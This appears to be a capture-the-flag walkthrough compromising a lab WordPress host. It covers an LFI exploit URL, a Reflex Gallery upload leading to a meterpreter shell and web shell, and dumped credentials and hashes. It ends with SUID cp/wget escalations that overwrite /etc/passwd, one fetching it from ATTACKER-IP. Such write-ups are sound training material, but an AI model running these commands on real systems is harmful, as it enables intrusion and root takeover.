# Recon
# NMAP
```txt
PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)

```

## Web
- Apache 2.4.29
- No `robots.txt`
- No `index.php`

### Feroxbuster
```txt
/info.php returns the host IP
/javascript 403
/notes.txt contains "You Need to ZIP Your Wayout"
```

#### Wordpress
- Wordpress installation found at `/wordpress`.
##### WPSCAN
```txt
WordPress version 5.2.3
mail-masta 1.0 plugin
reflex-gallery 3.1.3 plugin OUT OF DATE
site-editor 1.1.1 plugin
slide-show-gallery 1.4.6 plugin OUT OF DATE
wp-easy-cart-data unknown version
wp-support-plus-responsive-ticket-system 7.1.3 OUT OF DATE
wp-symposium 15.1 plugin
```
- Users found :
```txt
aarti
admin
```

# Exploit
## Mail-masta
- No known exploits.
## Reflex-Gallery
- Version 3.1.3 is vulnerable to arbitary file upload which does not require authentication.
- A metasploit module exists for this.
## Site-Editor
- Site-editor 1.1.1. plugin is vulnerable to CVE-2018-7422 which is a LFI attack.
- The vulnerable path is `wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd`
- Testing at our host it is indeed vulnerable to it.
```sh
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
mysql:x:122:128:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin
{"success":true,"data":{"output":[]}}
```

# Foothold
- Using the exploit for Reflex Gallery 3.1.3 we are able to get a meterpreter shell
- Since we can write to the wordpress directory, we can upload a web-shell to maintain persistence.
```sh
meterpreter > upload /usr/share/webshell/php/webshell.php
```
- Now we can head to `http://192.168.141.23/wordpress/web-shell.php` to get a better shell or execute any commands on the server.

# Post-Exploit
- Currently user `www-data`
- `wp-config.php` is present in the root wordpress directory.
```php
/** MySQL database username */                                                                                                                                                                                                                
define( 'DB_USER', 'raj' );                                                                                                                                                                                                                   
                                                                                                                                                                                                                                              
/** MySQL database password */                                                                                                                                                                                                                
define( 'DB_PASSWORD', '123' );  
```
- Possible credentials
`raj:123`
- Cant escalate to user `raj` with those however we can access the database.
- Found credentials for users in wordpress database and `wp-users` table.
`aarti:$P$BHyn.q5e5/HG9/UT/Ow3xkH2xXsikx0`
`admin:$P$BYWgfD7pa572QS9YFoeVVmhrIhBAx0.`
- Kernel version `Linux version 5.0.0-27-generic`
- There is a suspicious file called `secret.zip` at the root of `/var/www/`
- Attempt to crack the file with zip2john failed.
- We can try cracking the hashes we found in the DB while we look around.
- We can run linpeas while we're looking around
## Internal Enumeration
### Interesting Findings
- Sudo version `Sudo version 1.8.21p2`
- Something running on port 38285 `127.0.0.1:38285 `
- `ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it`
- `runc was found in /usr/sbin/runc, you may be able to escalate privileges with it`
#### SUID
```sh
-rwsr-xr-x 1 root root 22K Jun 28  2019 /usr/bin/arping
-rwsr-xr-x 1 root root 488K Apr  8  2019 /usr/bin/wget
-rwsr-xr-x 1 root root 139K Jan 18  2018 /bin/cp


```

##### CP
- For `cp`, I used followed an [article which explains it perfectly.](https://www.hackingarticles.in/linux-for-pentester-cp-privilege-escalation/)
- Basically, if we add a password or a new user `/etc/passwd` with root permissions we are basically root.
- Since the binary is running with SUID as root. We can change `/etc/passwd`.
- First we create a hash for our malicious user using `openssl`
```sh
openssl passwd -1 -salt ignite pass123
$1$ignite$3eTbJm98O9Hz.k1NTdNxe1
```
- Now we download the original `/etc/passwd` to our machine to edit it. 
- Now let's an entry for user with root permission at the bottom
```sh
faris:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
```
- Now we send back the modified `passwd` file back to the victim.
- Now we simply copy the modified `passwd` to `/etc/passwd` which is the original one
```sh
cp passwd /etc/passwd

```
- Now we can simply `su` as user `faris` and get root privileges.
- Root flag : `0b2c4c017371b3b24e49d278365cd27e`

#### wget
- For `wget`, I'm also following an article from [hackingarticles](https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/)
- While we could download `/etc/shadow` that wouldn't be that cool. Cracking hashes is not fun too.
- For this, we're also going to modify `/etc/passwd``
- Like `cp`, create a entry at the bottom of the original `passwd` that we download from the victim.
- Now we host our files using python
`python3 -m http.server`
- Now on the victim machine, we need to change directory to `/etc` to overwrite the existing `passwd`
```sh
$ cd /etc
$ wget -O passwd http://ATTACKER-IP/passwd
```
- This will output the file as `passwd` overwriting the old one.
- Now we can just `su` as the user we created with root privileges for root permission
- Root flag : `0b2c4c017371b3b24e49d278365cd27e`

`